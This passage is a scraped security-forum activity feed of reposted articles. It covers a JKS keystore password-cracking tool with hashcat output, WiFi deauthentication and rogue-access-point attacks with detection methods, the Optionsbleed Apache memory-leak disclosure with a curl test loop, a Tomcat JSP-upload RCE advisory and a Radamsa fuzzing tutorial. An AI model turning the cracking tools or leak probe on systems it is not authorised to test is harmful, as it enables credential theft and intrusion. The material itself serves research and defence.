5505024000/10460353203 (52.63%) Candidates.#1....: NNVGFSRFO -> Z|ZFVDUFO HWMon.Dev.#1.....: Temp: 75c Fan: 89% Util:100% Core:1936MHz Mem:4513MHz Bus:1 Started: Tue May 30 17:41:56 2017 Stopped: Tue May 30 17:50:24 2017 So from this repository you basically only need the JksPrivkPrepare.jar to run a cracking session. Other things in this repository test_run.sh: A little test script that you should be able to run after a couple of minutes to see this project in action. It includes comments on how to setup the dependencies for this project. benchmarking: tests that show why you should use this technique and not others. Please read the "Nail in the JKS coffin" article. example_jks: generate example JKS files fingerprint_creation: Every plaintext private key in PKCS#8 has it's own "fingerprint" that we expect when we guess the correct password. These fingerprints are necessary to make sure we are able to detect when we guessed the correct password. Please read the "Nail in the JKS coffin" article. This folder has the code to generate these fingerprints, it's a little bit hacky but I don't expect that it will be necessary to add any other fingerprints ever. JksPrivkPrepare: The source code of how the JKS files are read and the hash calculated we need to give to hashcat. jksprivk_crack.py: A proof of concept implementation that can be used instead of hashcat. Obviously this is much slower than hashcat, but it can outperform John the Ripper (JtR) in certain cases. Please read the "Nail in the JKS coffin" article. jksprivk_decrypt.py: A little helper script that can be used to extract a private key once the password was correctly guessed. run_example_jks.sh: A script that runs JksPrivkPrepare.jar and jksprivk_crack.py on all example JKS files in the example_jks folder. Make sure you run the generate_examples.py in example_jks script before. Related work and further links A big shout to Casey Marshall who wrote the JKS.java class, which is used in a modified version in this project: /* JKS.java -- implementation of the "JKS" key store. Copyright (C) 2003 Casey Marshall <rsdio@metastatic.org> Permission to use, copy, modify, distribute, and sell this software and its documentation for any purpose is hereby granted without fee, provided that the above copyright notice appear in all copies and that both that copyright notice and this permission notice appear in supporting documentation. No representations are made about the suitability of this software for any purpose. It is provided "as is" without express or implied warranty. This program was derived by reverse-engineering Sun's own implementation, using only the public API that is available in the 1.4.1 JDK. Hence nothing in this program is, or is derived from, anything copyrighted by Sun Microsystems. While the "Binary Evaluation License Agreement" that the JDK is licensed under contains blanket statements that forbid reverse-engineering (among other things), it is my position that US copyright law does not and cannot forbid reverse-engineering of software to produce a compatible implementation. There are, in fact, numerous clauses in copyright law that specifically allow reverse-engineering, and therefore I believe it is outside of Sun's power to enforce restrictions on reverse-engineering of their software, and it is irresponsible for them to claim they can. */ Various more information which are mentioned in the article as well: JKS is going to be replace as the default type in Java 9 http://openjdk.java.net/jeps/229 https://gist.github.com/zach-klippenstein/4631307 http://www.openwall.com/lists/john-users/2015/06/07/3 https://github.com/bes/KeystoreBrute https://github.com/jeffers102/KeystoreCracker https://github.com/volure/keystoreBrute https://gist.github.com/robinp/2143870 https://www.darknet.org.uk/2015/06/patator-multi-threaded-service-url-brute-forcing-tool/ https://github.com/rsertelon/android-keystore-recovery https://github.com/MaxCamillo/android-keystore-password-recover https://cryptosense.com/mighty-aphrodite-dark-secrets-of-the-java-keystore/ https://hashcat.net/events/p12/js-sha1exp_169.pdf https://github.com/hashcat/hashcat Neighborly greetings go out to atom, vollkorn, cem, doegox, corkami, xonox and rexploit for supporting this research in one form or another! Sursa: https://github.com/floyd-fuh/JKS-private-key-cracker-hashcat
  11. Nytro

    Fun stuff

  12. Nytro

    Kali update

    Cred ca da.
  13. Dar cele uploadate nu sunt si ele verificate de catre cineva?
  14. Physical Penetration Testing Walter Belgers Your pentesting goal: getting the data. You decide to do it physically. How to go about? #PhysicalSecurity Link: https://media.ccc.de/v/SHA2017-24-physical_penetration_testing
      • 1
      • Upvote
  15. Wireless LAN auditing procedure for industrial environments Magnus Andreas Ohm Abstract Today’s industry is dependent on computer networks. These computer networks are a vital part of how industrial environments operate. They are used for a variety of different tasks. Networks are needed to do everything from operating possibly dangerous equipment, to support employees in their every day activities. Having to support such a variety of tasks means that these networks will need to fulfill a lot of different requirements to function in a proper and safe way. DNV-GL has seen that these requirements are often not upheld in industrial environments. They have therefore seen a business opportunity when it comes to testing networks that operates in these types of environments. Download: https://brage.bibsys.no/xmlui/bitstream/handle/11250/2441138/16203_FULLTEXT.pdf
  16. Common WiFi Attacks And How To Detect Them Posted on September 19, 2017 in wifi, security I'm talking about DFIR (Digital Forensics and Incident Response) for WiFi networks at DerbyCon 2017 and will be releasing nzyme (an open source tool to record and forward 802.11 management frames into Graylog for WiFi security monitoring and incident response) soon. Note that I will simplify some of the 802.11 terminologies in this post. For example, I'll talk about "devices" and not "stations, " and I'll not use the term "BSS" for "networks." The Issue With 802.11 Management Frames The 802.11 WiFi standard contains a special frame (think "packets" in classic, wired networking) type for network and connection management. For example, your computer is not actively "scanning for networks" when you hit the tray icon to see all networks in range, but it passively listens for so-called "beacon" management frames from access points broadcasting to the world that they are there and available. Another management frame is the "probe-request" ("Hi, is my home network in range?") that your devices are sending to see if networks they connected before are in range. If such a network is in range, the relevant access points would respond with a "probe-response" frame ("Hi, yes I'm here! You can connect to me without waiting for a beacon frame.") The problem with management frames is that they are completely unencrypted. This makes WiFi easy to use because, for example, you can see networks and their names around you without exchanging some key or password first, but it also makes WiFi networks prone to many kinds of attacks. Common Attacks Explained Sniffing Traffic Virtually all WiFi traffic can be sniffed with adapters in monitor mode. Most Linux distributions support to put certain WiFi chipsets into this special mode that will process all traffic in the air and not only that of a network you are connected to. Everyone can get WiFi adapters with such a chipset from Amazon, some for less than $20. Encrypted networks will also not really protect you. WEP encryption can be cracked in a matter of minutes and even WPA2-PSK is not secure if you know the passphrase of a network (for example, because it's the office network and you work there, of because the local coffee shop has it written on the door) and can listen to the association process of the device. This works because the device-specific encryption between you and the access point uses a combination of the network passphrase and another key that is publicly exchanged (remember, management frames are not encrypted) during the association process. An attacker could force a new authentication process by spoofing a deauthentication frame that will disconnect your device for a moment. (more on that below) Detecting Sniffers Sniffing traffic is passive and cannot be detected. As a user, consider all WiFi traffic on open or closed to be public and make sure to use encryption on higher layers, like HTTPs. (Really, you should be doing this anyways, in any network.) Brute-Forcing Access Like any other password, passphrases for wireless networks can be brute-forced. WEP can be cracked by analyzing recorded traffic within minutes and has been rendered useless. For WPA secured networks you'd need a standard dictionary attack that just tries a lot of passwords. Detecting Brute Force Attacks Brute-forcing by actually authenticating to an access point is extremely slow and not even necessary. Most brute force cracking tools work against recorded (sniffed) WiFi traffic. An attacker could just quietly sit in the car in front of your office, recording traffic for some time and then crack the password at home. Like sniffing, this approach cannot be detected. The only protection is to use a strong password and to avoid WEP. Jamming The obvious way of jamming WiFi networks would be just to pump the relevant frequencies full of garbage. However, this would require fairly specialist equipment and maybe even quite some transmitting power. Surprisingly, the 802.11 standard brings a much easier way: Deauthentication and disassociation frames. Those "deauth" frames are supposed to be used in different scenarios, and the standard has more than 40 pre-defined reason codes. I selected a few to give you an idea of some legitimate use-cases: Previous authentication no longer valid Disassociated due to inactivity Disassociated because AP is unable to handle all currently associated STAs Association denied due to requesting STA not supporting all of the data rates in the BSSBasicRateSet parameter Requested from peer STA as the STA is leaving the BSS (or resetting) Because deauth frames are management frames, they are unencrypted, and anyone can spoof them even when not connected to a network. Attackers in range can send constant deauth frames that appear to come from the access point you are connected to (by just setting the "transmitter" address in the frame) and your device will listen to that instruction. There are "jammer" scripts that sniff out a list of all access points and clients, while constantly sending deauth frames to all of them. Detecting Jammers A tool like nzyme (to be released - see introduction) would sniff out the deauth frames, and Graylog could alert on unusual levels of this frame subtype. Rogue Access Points Let's talk about how your phone automatically connects to WiFi networks it thinks it knows. There are two different ways this can happens: It picks up beacon frames ("Hi, I'm network X and I'm here.") of a network it knows and starts associating with the closest (strongest signal) access point. It sends a probe-request frame ("Hello, is an access point serving network X around?") for a known network and an access point serving such a network responds with a probe-response frame. ("Hello, yep I'm here!") Your phone will then connect to that access point. Here is the problem: Any device can send beacon and probe-response frames for any network. Attackers can walk around with a rogue access point that responds to any probe-request with a probe-response, or they could start sending beacons for a corporate network they are targeting. Some devices now have protections and will warn you if you they are about to connect to a network that is not encrypted but was previously encrypted. However, this does not help if an attacker knows the password or just targets an unencrypted network of your coffee shop. Your phone would blindly connect, and now you have an attacker sitting in the middle of your connection, listening to all your communications or starting attacks like DNS or ARP poisoning. An attacker could even show you a malicious captive portal (the sign-in website some WiFi networks show you before they'll let you in) to phish or gather more information about your browser. Take a look at a miniaturized attack platform like the famous WiFi Pineapple to get an idea of how easy it is to launch these kinds of attacks. Rogue access points are notoriously hard to spot because it's complicated to locate them physically and they usually blend into the existing access point infrastructure quite well - at least on the surface. Here are some ways to still spot them using my to-be-released tool nzyme and Graylog: Detecting Rogue Access Points Method 1: BSSID whitelisting Like other network devices, every WiFi access point has a MAC address that is part of every message it sends. A simple way to detect rogue access points is to keep a list of your trusted access points and their MAC addresses and to match this against the MAC addresses that you see in the air. The problem is that an attacker can easily spoof the MAC address and, by doing that, circumvent this protective measure. Method 2: Non-synchronized MAC timestamps It is important that every access point that spawns the same network has a highly synchronized internal clock. For that reason, the access points are constantly exchanging timestamps for synchronization in their beacon frames. The unit here is microseconds, and the goal is to stay synchronized within a delta of 25µs. Most rogue access points will not attempt to synchronize the timestamps properly, and you can detect that slip. Method 3: Wrong channel You could keep a list of what channels your access points are operating on and find out if a rogue access point is using a channel your infrastructure is not supposed to use. For an attacker, being detected by this method is extremely easy: Recon the site first and configure the rogue access point to only use already used channels. Another caveat here is that many access points will dynamically switch channels based on capacity anyways. Method 4: Crypto drop An attacker who does not know the password of an encrypted network she targets might start a rogue access point that spins up an open network instead. Search for networks with your name, but no (or the wrong) encryption. Method 5: Signal strength anomalies There are many ways to spot a rogue access point by analyzing signal strength baselines and looking for anomalies. If an attacker sits on the parking lot and is spoofing one of your access points, including its MAC address (BSSID), it will suddenly have a change in the mean signal strength because he is further away from the sensor (nzyme) then the real access point. What's Next? I will share another post with examples on how to detect these attacks using nzyme and Graylog soon. For updates, make sure to follow me on Twitter or to subscribe to the blog. Written By Lennart Koopmann Follow me on Twitter or subscribe to the blog. Sursa: https://wtf.horse/2017/09/19/common-wifi-attacks-explained/
      • 1
      • Upvote
  17. rVMI: Perform Full System Analysis with Ease September 18, 2017 | by Jonas Pfoh, Sebastian Vogl | Threat Research Manual dynamic analysis is an important concept. It enables us to observe the behavior of a sophisticated malware sample or exploit by executing it in a controlled environment. The information gathered through this process is often crucial in gaining a full understanding of a sample. When performing manual dynamic analysis today, there are essentially two tools one can use: debuggers and sandboxes. While both of these tools are certainly very valuable, neither has been designed for the purpose of manual dynamic analysis. As a consequence, both approaches have inherent shortcomings that make interactive dynamic analysis difficult and tedious. In this blog post we present a novel approach to manual dynamic analysis: rVMI. rVMI was specifically designed for interactive malware analysis. It combines virtual machine introspection (VMI) and memory forensics to provide a platform for interactive and scriptable analysis. This blog post follows our presentation at Black Hat USA 2017. What is rVMI? rVMI can best be described as debugger on steroids. In contrast to traditional debuggers, rVMI operates entirely outside of the target environment and allows the analysis of a live system from the hypervisor-level. This is achieved by combining VMI with memory forensics. In particular, rVMI makes use of full system virtualization to move the debugger out of the virtual machine (VM) to the hypervisor-level. As a result, the debugger runs isolated from the malware executed in a QEMU/KVM VM. This gives the analyst complete control over the target through VMI while keeping the malware in an isolated, debugger free environment. In addition, this enables an analyst to pause and resume the VM at any point in time as well as making use of traditional debugging functionality such as breakpoints and watchpoints. To bridge the semantic gap and support full system analysis, rVMI makes use of Rekall. Rekall is a powerful open source memory forensics framework. It provides a wide range of features that allow one to enumerate processes, inspect kernel data structures, access process address spaces, and much more. While Rekall usually works with static memory dumps, rVMI extends Rekall to support live VMs. This enables an analyst to leverage the entire Rekall feature set while performing an analysis with rVMI, effectively allowing them to inspect user space processes, kernel drivers, and even pre-boot environments with a single tool. rVMI supports all operating systems that Rekall supports, including Windows (XP-10), Linux, and Mac OS X. Analysis is performed through an iPython shell that makes all Rekall and VMI features available through a single interface. In addition, rVMI provides a Python API that makes it easy to automate tasks through external scripts or on-the-fly within the iPython shell. Finally, rVMI supports snapshots, which allows an analyst to easily save or restore states of the target environment. Articol complet: https://www.fireeye.com/blog/threat-research/2017/09/rvmi-full-system-analysis.html
  18. X41 Browser Security White Paper - Tools and PoCs X41 D-Sec GmbH (“X41”) - a research driven IT-Security company - released an in-depth analysis of the three leading enterprise web browsers Google Chrome, Microsoft Edge, and Internet Explorer. The full paper can be downloaded at: https://browser-security.x41-dsec.de/X41-Browser-Security-White-Paper.pdf (Sha256 d05d9df68ad8d6cee1491896b21485a48296f14112f191253d870fae16dc17de) Sursa: https://browser-security.x41-dsec.de/X41-Browser-Security-White-Paper.pdf
      • 2
      • Upvote
      • Like
  19. https://blog.avast.com/update-to-the-ccleaner-5.33.1612-security-incident
  20. Optionsbleed - HTTP OPTIONS method can leak Apache's server memory Posted by Hanno Böck on Monday, September 18. 2017 If you're using the HTTP protocol in everday Internet use you are usually only using two of its methods: GET and POST. However HTTP has a number of other methods, so I wondered what you can do with them and if there are any vulnerabilities. One HTTP method is called OPTIONS. It simply allows asking a server which other HTTP methods it supports. The server answers with the "Allow" header and gives us a comma separated list of supported methods. A scan of the Alexa Top 1 Million revealed something strange: Plenty of servers sent out an "Allow" header with what looked like corrupted data. Some examples: Allow: ,GET,,,POST,OPTIONS,HEAD,, Allow: POST,OPTIONS,,HEAD,:09:44 GMT Allow: GET,HEAD,OPTIONS,,HEAD,,HEAD,,HEAD,, HEAD,,HEAD,,HEAD,,HEAD,POST,,HEAD,, HEAD,!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" Allow: GET,HEAD,OPTIONS,=write HTTP/1.0,HEAD,,HEAD,POST,,HEAD,TRACE That clearly looked interesting - and dangerous. It suspiciously looked like a "bleed"-style bug, which has become a name for bugs where arbitrary pieces of memory are leaked to a potential attacker. However these were random servers on the Internet, so at first I didn't know what software was causing this. Sometimes HTTP servers send a "Server" header telling the software. However one needs to be aware that the "Server" header can lie. It's quite common to have one HTTP server proxying another. I got all kinds of different "Server" headers back, but I very much suspected that these were all from the same bug. I tried to contact the affected server operators, but only one of them answered, and he was extremely reluctant to tell me anything about his setup, so that wasn't very helpful either. However I got one clue: Some of the corrupted headers contained strings that were clearly configuration options from Apache. It seemed quite unlikely that those would show up in the memory of other server software. But I was unable to reproduce anything alike on my own Apache servers. I also tried reading the code that put together the Allow header to see if I can find any clues, but with no success. So without knowing any details I contacted the Apache security team. Fortunately Apache developer Jacob Champion digged into it and figured out what was going on: Apache supports a configuration directive Limit that allows restricting access to certain HTTP methods to a specific user. And if one sets the Limit directive in an .htaccess file for an HTTP method that's not globally registered in the server then the corruption happens. After that I was able to reproduce it myself. Setting a Limit directive for any invalid HTTP method in an .htaccess file caused a use after free error in the construction of the Allow header which was also detectable with Address Sanitizer. (However ASAN doesn't work reliably due to the memory allocation abstraction done by APR.) FAQ What's Optionsbleed? Optionsbleed is a use after free error in Apache HTTP that causes a corrupted Allow header to be constructed in response to HTTP OPTIONS requests. This can leak pieces of arbitrary memory from the server process that may contain secrets. The memory pieces change after multiple requests, so for a vulnerable host an arbitrary number of memory chunks can be leaked. The bug appears if a webmaster tries to use the "Limit" directive with an invalid HTTP method. Example .htaccess: <Limit abcxyz> </Limit> How prevalent is it? Scanning the Alexa Top 1 Million revealed 466 hosts with corrupted Allow headers. In theory it's possible that other server software has similar bugs. On the other hand this bug is nondeterministic, so not all vulnerable hosts may have been caught. So it only happens if you set a quite unusual configuration option? There's an additional risk in shared hosting environments. The corruption is not limited to a single virtual host. One customer of a shared hosting provider could deliberately create an .htaccess file causing this corruption hoping to be able to extract secret data from other hosts on the same system. I can't reproduce it! Due to its nature the bug doesn't appear deterministically. It only seems to appear on busy servers. Sometimes it only appears after multiple requests. Does it have a CVE? CVE-2017-9798. I'm seeing Allow headers containing HEAD multiple times! This is actually a different Apache bug (#61207) that I found during this investigation. It causes HEAD to appear three times instead of once. However it's harmless and not a security bug. Launchpad also has a harmless bug that produces a malformed Allow header, using a space-separated list instead of a comma-separated one. How can I test it? A simple way is to use Curl in a loop and send OPTIONS requests: for i in {1..100}; do curl -sI -X OPTIONS https://www.google.com/|grep -i "allow:"; done Depending on the server configuration it may not answer to OPTIONS requests on some URLs. Try different paths, HTTP versus HTTPS hosts, non-www versus www etc. may lead to different results. Please note that this bug does not show up with the "*" OPTIONS target, you need a specific path. Here's a python proof of concept script. What shall I do? If you run an Apache web server you should update. Most distributions should have updated packages by now or very soon. A patch can be found here. A patch for Apache 2.2 is available here (thanks to Thomas Deutschmann for backporting it). Unfortunately the communication with the Apache security team wasn't ideal. They were unable to provide a timeline for a coordinated release with a fix, so I decided to define a disclosure date on my own without an upstream fix. If you run an Apache web server in a shared hosting environment that allows users to create .htaccess files you should drop everything you are doing right now, update immediately and make sure you restart the server afterwards. Is this as bad as Heartbleed? No. Although similar in nature, this bug leaks only small chunks of memory and more importantly only affects a small number of hosts by default. It's still a pretty bad bug, particularly for shared hosting environments. Updates: Distribution updates: Gentoo: Commit (2.2.34 / 2.4.27-r1 fixed), Bug NetBSD/pkgsrc: Commit Arch Linux: Commit (2.4.27-2 fixed) Debian: unfixed, Security Tracker Media: Apache-Webserver blutet (Golem.de) Sursa: https://blog.fuzzing-project.org/60-Optionsbleed-HTTP-OPTIONS-method-can-leak-Apaches-server-memory.html
  21. [SECURITY] CVE-2017-12615 Apache Tomcat Remote Code Execution via JSP upload From: Mark Thomas <markt@xxxxxxxxxx> To: Tomcat Users List <users@xxxxxxxxxxxxxxxxx> CC: "announce@xxxxxxxxxxxxxxxxx" <announce@xxxxxxxxxxxxxxxxx>, announce@xxxxxxxxxx, Tomcat Developers List <dev@xxxxxxxxxxxxxxxxx> Date: Tue, 19 Sep 2017 11:58:44 +0100 CVE-2017-7674 Apache Tomcat Remote Code Execution via JSP Upload Severity: Important Vendor: The Apache Software Foundation Versions Affected: Apache Tomcat 7.0.0 to 7.0.79 Description: When running on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server. Mitigation: Users of the affected versions should apply one of the following mitigations: - Upgrade to Apache Tomcat 7.0.81 or later (7.0.80 was not released) Credit: This issue was reported responsibly to the Apache Tomcat Security Team by iswin from 360-sg-lab (360观星实验室) History: 2017-09-19 Original advisory References: [1] http://tomcat.apache.org/security-7.html Sursa: https://mailinglist-archive.mojah.be/varia-announce/2017-09/msg00010.php
  22. Nytro

    Kali update

    Am facut azi update la Kali, si nu mai mergea login-ul din interfata grafica. Daca patiti le fel: - Apasati Ctrl + Alt + F3 - Va logati - apt-get --fix-broken install - apt-get autoremove Via: https://unix.stackexchange.com/questions/391143/kali-2017-2-graphical-login-fails
  23. Ceva util pe acolo?
  24. Urata treaba
  25. A Crash Course to Radamsa Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestringly different outputs from them. The main selling points of radamsa are that it has already found a slew of bugs in programs that actually matter, it is easily scriptable and easy to get up and running. Nutshell: $ # please please please fuzz your programs. here is one way to get data for it: $ sudo apt-get install gcc make git wget $ git clone https://github.com/aoh/radamsa.git && cd radamsa && make && sudo make install $ echo "HAL 9000" | radamsa What the Fuzz Programming is hard. All nontrivial programs have bugs in them. What's more, even the simplest typical mistakes are in some of the most widely used programming languages usually enough for attackers to gain undesired powers. Fuzzing is one of the techniques to find such unexpected behavior from programs. The idea is simply to subject the program to various kinds of inputs and see what happens. There are two parts in this process: getting the various kinds of inputs and how to see what happens. Radamsa is a solution to the first part, and the second part is typically a short shell script. Testers usually have a more or less vague idea what should not happen, and they try to find out if this is so. This kind of testing is often referred to as negative testing, being the opposite of positive unit- or integration testing. Developers know a service should not crash, should not consume exponential amounts of memory, should not get stuck in an infinite loop, etc. Attackers know that they can probably turn certain kinds of memory safety bugs into exploits, so they fuzz typically instrumented versions of the target programs and wait for such errors to be found. In theory, the idea is to counterprove by finding a counterexample a theorem about the program stating that for all inputs something doesn't happen. There are many kinds of fuzzers and ways to apply them. Some trace the target program and generate test cases based on the behavior. Some need to know the format of the data and generate test cases based on that information. Radamsa is an extremely "black-box" fuzzer, because it needs no information about the program nor the format of the data. One can pair it with coverage analysis during testing to likely improve the quality of the sample set during a continuous test run, but this is not mandatory. The main goal is to first get tests running easily, and then refine the technique applied if necessary. Radamsa is intended to be a good general purpose fuzzer for all kinds of data. The goal is to be able to find issues no matter what kind of data the program processes, whether it's xml or mp3, and conversely that not finding bugs implies that other similar tools likely won't find them either. This is accomplished by having various kinds of heuristics and change patterns, which are varied during the tests. Sometimes there is just one change, sometimes there a slew of them, sometimes there are bit flips, sometimes something more advanced and novel. Radamsa is a side-product of OUSPG's Protos Genome Project, in which some techniques to automatically analyze and examine the structure of communication protocols were explored. A subset of one of the tools turned out to be a surprisingly effective file fuzzer. The first prototype black-box fuzzer tools mainly used regular and context-free formal languages to represent the inferred model of the data. Requirements Supported operating systems: GNU/Linux OpenBSD FreeBSD Mac OS X Windows (using Cygwin) Software requirements for building from sources: gcc / clang make git Building Radamsa $ git clone https://github.com/aoh/radamsa.git $ cd radamsa $ make $ sudo make install # optional, you can also just grab bin/radamsa $ radamsa --help Radamsa itself is just a single binary file which has no external dependencies. You can move it where you please and remove the rest. Fuzzing with Radamsa This section assumes some familiarity with UNIX scripting. Radamsa can be thought as the cat UNIX tool, which manages to break the data in often interesting ways as it flows through. It has also support for generating more than one output at a time and acting as a TCP server or client, in case such things are needed. Use of radamsa will be demonstrated by means of small examples. We will use the bc arbitrary precision calculator as an example target program. In the simplest case, from scripting point of view, radamsa can be used to fuzz data going through a pipe. $ echo "aaa" | radamsa aaaa Here radamsa decided to add one 'a' to the input. Let's try that again. $ echo "aaa" | radamsa ːaaa Now we got another result. By default radamsa will grab a random seed from /dev/urandom if it is not given a specific random state to start from, and you will generally see a different result every time it is started, though for small inputs you might see the same or the original fairly often. The random state to use can be given with the -s parameter, which is followed by a number. Using the same random state will result in the same data being generated. $ echo "Fuzztron 2000" | radamsa --seed 4 Fuzztron 4294967296 This particular example was chosen because radamsa happens to choose to use a number mutator, which replaces textual numbers with something else. Programmers might recognize why for example this particular number might be an interesting one to test for. You can generate more than one output by using the -n parameter as follows: $ echo "1 + (2 + (3 + 4))" | radamsa --seed 12 -n 4 1 + (2 + (2 + (3 + 4?) 1 + (2 + (3 +?4)) 18446744073709551615 + 4))) 1 + (2 + (3 + 170141183460469231731687303715884105727)) There is no guarantee that all of the outputs will be unique. However, when using nontrivial samples, equal outputs tend to be extremely rare. What we have so far can be used to for example test programs that read input from standard input, as in $ echo "100 * (1 + (2 / 3))" | radamsa -n 10000 | bc [...] (standard_in) 1418: illegal character: ^_ (standard_in) 1422: syntax error (standard_in) 1424: syntax error (standard_in) 1424: memory exhausted [hang] Or the compiler used to compile Radamsa: $ echo '((lambda (x) (+ x 1)) #x124214214)' | radamsa -n 10000 | ol [...] > What is 'ó µ'? 4901126677 > $ Or to test decompression: $ gzip -c /bin/bash | radamsa -n 1000 | gzip -d > /dev/null Typically however one might want separate runs for the program for each output. Basic shell scripting makes this easy. Usually we want a test script to run continuously, so we'll use an infinite loop here: $ gzip -c /bin/bash > sample.gz $ while true; do radamsa sample.gz | gzip -d > /dev/null; done Notice that we are here giving the sample as a file instead of running Radamsa in a pipe. Like cat Radamsa will by default write the output to stdout, but unlike cat when given more than one file it will usually use only one or a few of them to create one output. This test will go about throwing fuzzed data against gzip, but doesn't care what happens then. One simple way to find out if something bad happened to a (simple single-threaded) program is to check whether the exit value is greater than 127, which would indicate a fatal program termination. This can be done for example as follows: $ gzip -c /bin/bash > sample.gz $ while true do radamsa sample.gz > fuzzed.gz gzip -dc fuzzed.gz > /dev/null test $? -gt 127 && break done This will run for as long as it takes to crash gzip, which hopefully is no longer even possible, and the fuzzed.gz can be used to check the issue if the script has stopped. We have found a few such cases, the last one of which took about 3 months to find, but all of them have as usual been filed as bugs and have been promptly fixed by the upstream. One thing to note is that since most of the outputs are based on data in the given samples (standard input or files given at command line) it is usually a good idea to try to find good samples, and preferably more than one of them. In a more real-world test script radamsa will usually be used to generate more than one output at a time based on tens or thousands of samples, and the consequences of the outputs are tested mostly in parallel, often by giving each of the output on command line to the target program. We'll make a simple such script for bc, which accepts files from command line. The -o flag can be used to give a file name to which radamsa should write the output instead of standard output. If more than one output is generated, the path should have a %n in it, which will be expanded to the number of the output. $ echo "1 + 2" > sample-1 $ echo "(124 % 7) ^ 1*2" > sample-2 $ echo "sqrt((1 + length(10^4)) * 5)" > sample-3 $ bc sample-* < /dev/null 3 10 5 $ while true do radamsa -o fuzz-%n -n 100 sample-* bc fuzz-* < /dev/null test $? -gt 127 && break done This will again run up to obviously interesting times indicated by the large exit value, or up to the target program getting stuck. In practice many programs fail in unique ways. Some common ways to catch obvious errors are to check the exit value, enable fatal signal printing in kernel and checking if something new turns up in dmesg, run a program under strace, gdb or valgrind and see if something interesting is caught, check if an error reporter process has been started after starting the program, etc. Sursa: https://github.com/aoh/radamsa
×
×
  • Create New...